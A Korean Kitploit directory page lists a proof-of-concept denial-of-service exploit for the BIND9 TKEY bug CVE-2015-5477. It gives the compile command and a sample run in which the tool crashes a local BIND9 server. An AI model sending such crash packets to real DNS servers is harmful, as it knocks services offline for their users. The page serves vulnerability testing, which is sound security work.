Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2015-5477 — PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure | Kitploit
도구/GitHubGitHub/robertdavidgraham/cve-2015-5477
Vulnerability AnalysisExploitationPenetration TestingDNS Analysis
GitHubrobertdavidgraham/cve-2015-5477

cve-2015-5477

PoC exploit for CVE-2015-5477 BIND9 TKEY assertion failure

저장소 보기
644211년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

BOND9 TKEY assert DoS (CVE-2015-5477) PoC

이 익스플로잇은 BIND9 서버에 취약점이 있는지 확인하기 위해, 서버가 충돌하는지 보기 위해 익스플로잇을 보냅니다.

Unix/Windows에서 일반적인 방식으로 컴파일하는 C 코드입니다. 예를 들어:

root@kitploit:~
# gcc tkill.c -o tkill

IPv4와 IPv6 모두에서 실행됩니다.

다음은 localhost에 대해 실행했을 때의 모습입니다. 이름을 확인할 때 두 개의 IP 주소를 얻으므로, 둘 다 시도합니다. 먼저 "version" 문자열을 질의한 다음 익스플로잇을 보냅니다. 두 번째 주소를 검사할 때는 첫 번째 시도에서 서비스가 이미 충돌했기 때문에 버전 질의가 실패합니다.

root@kitploit:~
root@kali:~/cve-2015-5477# ./a.out localhost
--- PoC for CVE-2015-5477 BIND9 TKEY assert DoS ---
[+] localhost: Resolving to IP address
[+] localhost: Resolved to multiple IPs (NOTE)
[+] ::1: Probing...
[+] Querying version...
[+] ::1: "9.11.0pre-alpha"
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed

[+] 127.0.0.1: Probing...
[+] Querying version...
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] timed out getting version, trying again
[-] Can't query server, is it crashed already?
[-] Sending exploit anyway.
[+] Sending DoS packet...
[+] Waiting 5-sec for response...
[+] timed out, probably crashed
도구 다운로드